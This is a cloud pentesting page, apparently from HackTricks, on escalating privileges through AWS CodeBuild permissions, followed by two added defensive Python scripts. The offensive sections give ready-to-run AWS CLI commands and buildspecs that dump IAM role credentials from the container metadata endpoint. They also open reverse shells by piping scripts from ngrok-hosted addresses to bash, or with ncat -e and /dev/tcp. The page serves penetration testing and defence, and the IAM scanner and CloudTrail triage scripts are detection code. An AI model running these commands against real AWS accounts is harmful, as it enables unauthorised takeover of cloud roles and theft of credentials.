AWS - Codebuild Privesc



For more information check:

AWS - Codebuild Enum

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

An attacker with the iam:PassRole, codebuild:CreateProject and codebuild:StartBuild or codebuild:StartBuildBatch permissions can escalate privileges to any IAM role that CodeBuild is allowed to assume, by creating a project that uses that role and running a build in it.

# Option 1: enumerate the env and dump the role creds from the container credentials endpoint
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Option 2: get a rev shell (this assignment overrides option 1; keep only the one you want)
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

Potential Impact: Direct privesc to any AWS CodeBuild role.

Inside the CodeBuild container, the file /codebuild/output/tmp/env.sh contains all the env vars needed to reach the metadata credentials.

This file contains the env variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, which holds the URL path used to fetch the credentials. It will look something like /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Append that path to the URL http://169.254.170.2/ and you will be able to dump the credentials of the role.

Moreover, it also contains the env variable ECS_CONTAINER_METADATA_URI, which holds the full URL for retrieving metadata info about the container.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Just like in the previous section, if instead of creating a build project you can modify an existing one, you can point it at the IAM role you want and steal its token.

REV_PATH="/tmp/codebuild_pwn.json"

# Option 1: enumerate the env and dump the role creds from the container credentials endpoint
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Option 2: get a rev shell (this assignment overrides option 1; keep only the one you want)
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name <codebuild-demo-project>

Potential Impact: Direct privesc to any AWS CodeBuild role.

codebuild:StartBuild | codebuild:StartBuildBatch

Having just one of these permissions is enough to start a build with a new buildspec and steal the token of the IAM role attached to the project:

cat > /tmp/buildspec.yml <<EOF
version: 0.2

phases:
  build:
    commands:
      - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

aws codebuild start-build --project-name <project-name> --buildspec-override file:///tmp/buildspec.yml

Potential Impact: Direct privesc to the AWS CodeBuild roles attached to the project.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

As in the previous section, but without the iam:PassRole permission: you can abuse these permissions to modify existing CodeBuild projects and reach the role they already have attached.

REV_PATH="/tmp/codebuild_pwn.json"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"codebuild_lab_3_project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

printf "$JSON" > $REV_PATH

# Note how an image from the AWS public ECR is used instead of one from Docker Hub, since Docker Hub rate-limits CodeBuild!

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build-batch --project-name codebuild_lab_3_project

Potential Impact: Direct privesc to the AWS CodeBuild roles attached to the project.
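The four permission sets above (plus the S3 buildspec case covered later on this page) are exactly what an IAM reviewer should look for. The following is an added example, not HackTricks code, that scans an IAM policy document for those combinations. It evaluates only the Action element (wildcards and explicit Deny included) and ignores Resource, Condition and NotAction, so it over-approximates and is meant as a triage filter; the sample policies are constructed for illustration.

```python
"""Flag IAM policy documents that grant one of the CodeBuild privilege-escalation
permission sets discussed on this page. Added example, not HackTricks code; the
policy documents below are constructed for illustration."""
import fnmatch

# Each escalation path is a list of groups; a policy must grant at least one
# action from every group for the path to be reachable.
CODEBUILD_PRIVESC_PATHS = {
    "PassRole + CreateProject + StartBuild/StartBuildBatch": [
        ("iam:PassRole",),
        ("codebuild:CreateProject",),
        ("codebuild:StartBuild", "codebuild:StartBuildBatch"),
    ],
    "PassRole + UpdateProject + StartBuild/StartBuildBatch": [
        ("iam:PassRole",),
        ("codebuild:UpdateProject",),
        ("codebuild:StartBuild", "codebuild:StartBuildBatch"),
    ],
    "StartBuild/StartBuildBatch with buildspec override": [
        ("codebuild:StartBuild", "codebuild:StartBuildBatch"),
    ],
    "UpdateProject + StartBuild/StartBuildBatch (no PassRole)": [
        ("codebuild:UpdateProject",),
        ("codebuild:StartBuild", "codebuild:StartBuildBatch"),
    ],
    "StartBuild/StartBuildBatch + s3:GetObject + s3:PutObject (buildspec in S3)": [
        ("codebuild:StartBuild", "codebuild:StartBuildBatch"),
        ("s3:GetObject",),
        ("s3:PutObject",),
    ],
}


def _as_list(value):
    """IAM allows a string or a list for Statement/Action; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _action_matches(pattern, action):
    """IAM action names are case-insensitive and support * and ? wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def grants_action(policy, action):
    """True if an Allow statement matches `action` and no Deny statement does.

    Only the Action element is evaluated: Resource, Condition and NotAction are
    ignored, so this over-approximates what the principal can really do and is a
    triage filter, not an effective-permissions calculator.
    """
    allowed = denied = False
    for stmt in _as_list(policy.get("Statement")):
        if not any(_action_matches(p, action) for p in _as_list(stmt.get("Action"))):
            continue
        if stmt.get("Effect") == "Allow":
            allowed = True
        elif stmt.get("Effect") == "Deny":
            denied = True
    return allowed and not denied


def find_privesc_paths(policy):
    """Return the names of every CodeBuild escalation path the policy grants."""
    return [
        name
        for name, groups in CODEBUILD_PRIVESC_PATHS.items()
        if all(any(grants_action(policy, a) for a in group) for group in groups)
    ]


# Constructed sample policies (not taken from any real account).
CI_ADMIN_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:PassRole", "codebuild:*"], "Resource": "*"},
    ],
}
BUILD_TRIGGER_POLICY = {
    "Version": "2012-10-17",
    "Statement": {"Effect": "Allow", "Action": "codebuild:StartBuild", "Resource": "*"},
}
ADMIN_WITH_GUARDRAIL_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
        # An explicit Deny on starting builds cuts every path on this page.
        {"Effect": "Deny", "Action": "codebuild:Start*", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for label, policy in [("ci-admin", CI_ADMIN_POLICY),
                          ("build-trigger", BUILD_TRIGGER_POLICY),
                          ("admin-with-guardrail", ADMIN_WITH_GUARDRAIL_POLICY)]:
        print(label, "->", find_privesc_paths(policy) or "no CodeBuild privesc path")
```

Note that even the single permission codebuild:StartBuild is reported, because with --buildspec-override it is enough on its own; a real review must then check the Resource scope of that grant and which service role the reachable projects use.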

SSM

With enough permissions to start an SSM session, it is possible to get inside a CodeBuild project while it is being built.

The CodeBuild project will need to have a breakpoint:

phases:
  pre_build:
    commands:
      - echo Entered the pre_build phase...
      - echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

And then:

aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

For more information check the docs.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

An attacker who can start or restart the build of a specific CodeBuild project that stores its buildspec.yml file in an S3 bucket the attacker can write to can obtain command execution inside the CodeBuild process.

Note: this escalation is only useful if the CodeBuild worker has a different, potentially more privileged, role than the attacker's.

aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_build > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

You could use a buildspec like this one to get a reverse shell:

buildspec.yml
version: 0.2

phases:
  build:
    commands:
      - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Impact: Direct privesc to the role used by the AWS CodeBuild worker, which usually has high privileges.

Note that the buildspec may be expected in zip format, so the attacker would need to download and unzip the archive, modify the buildspec.yml in its root directory, zip it again and upload it.

More information can be found here.

Potential Impact: Direct privesc to the AWS CodeBuild roles attached to the project.
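Every vector on this page leaves a CloudTrail trace: StartBuild/StartBuildBatch with a buildspecOverride, CreateProject/UpdateProject carrying an inline buildspec or a serviceRole, and a PutObject on the buildspec.yml that a project reads from S3. The following is an added example, not HackTricks code, that triages a batch of CloudTrail records for those patterns. The requestParameters field names mirror the CodeBuild and S3 API parameter names, but the sample events are constructed and only approximate the real record layout; S3 PutObject only appears in CloudTrail when data events are enabled for the bucket.

```python
"""Triage CloudTrail events for the CodeBuild abuse patterns on this page:
a build started with a buildspec override, a project created/updated with an
inline buildspec or a new service role, and a buildspec.yml overwritten in S3.
Added example, not HackTricks code; the events below are constructed and only
approximate CloudTrail's real record layout."""

CODEBUILD = "codebuild.amazonaws.com"
S3 = "s3.amazonaws.com"


def _params(event):
    return event.get("requestParameters") or {}


def _actor(event):
    return (event.get("userIdentity") or {}).get("arn", "<unknown>")


def classify(event):
    """Return the list of rule names this single event triggers (possibly empty)."""
    source, name, params = event.get("eventSource"), event.get("eventName"), _params(event)
    hits = []
    if source == CODEBUILD and name in ("StartBuild", "StartBuildBatch"):
        # A buildspec supplied at start time replaces whatever the project stores.
        if "buildspecOverride" in params:
            hits.append("codebuild.start.buildspec-override")
    if source == CODEBUILD and name in ("CreateProject", "UpdateProject"):
        src = params.get("source") or {}
        # Inline buildspec: the build commands come straight from the API call.
        if "buildspec" in src:
            hits.append("codebuild.project.inline-buildspec")
        # A service role set on create/update is the PassRole half of the chain.
        if "serviceRole" in params:
            hits.append("codebuild.project.service-role-set")
    if source == S3 and name == "PutObject":
        key = params.get("key", "")
        if key.rsplit("/", 1)[-1] in ("buildspec.yml", "buildspec.yaml"):
            hits.append("s3.buildspec-overwritten")
    return hits


def triage(events):
    """Map each triggered rule to the set of actor ARNs behind it, for correlation."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(rule, set()).add(_actor(ev))
    return findings


# Constructed sample events (account id and names are placeholders).
SAMPLE_EVENTS = [
    {"eventSource": CODEBUILD, "eventName": "StartBuild",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"projectName": "web-ci"}},
    {"eventSource": CODEBUILD, "eventName": "StartBuild",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
     "requestParameters": {"projectName": "web-ci",
                           "buildspecOverride": "version: 0.2\nphases:\n  build:\n"
                                                "    commands:\n      - echo override\n"}},
    {"eventSource": CODEBUILD, "eventName": "UpdateProject",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
     "requestParameters": {"name": "web-ci",
                           "source": {"type": "NO_SOURCE", "buildspec": "version: 0.2\n"},
                           "serviceRole": "arn:aws:iam::111111111111:role/ci-admin-role"}},
    {"eventSource": S3, "eventName": "PutObject",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
     "requestParameters": {"bucketName": "ci-config", "key": "web-ci/buildspec.yml"}},
    {"eventSource": S3, "eventName": "PutObject",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"bucketName": "ci-config", "key": "web-ci/README.md"}},
]

if __name__ == "__main__":
    for rule, actors in triage(SAMPLE_EVENTS).items():
        print(f"{rule}: {sorted(actors)}")
```

The per-actor grouping is the useful part: one principal appearing under both codebuild.project.service-role-set and codebuild.start.buildspec-override within a short window is the CreateProject/UpdateProject chain from the top of this page, whereas a plain StartBuild from the usual CI identity is noise.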
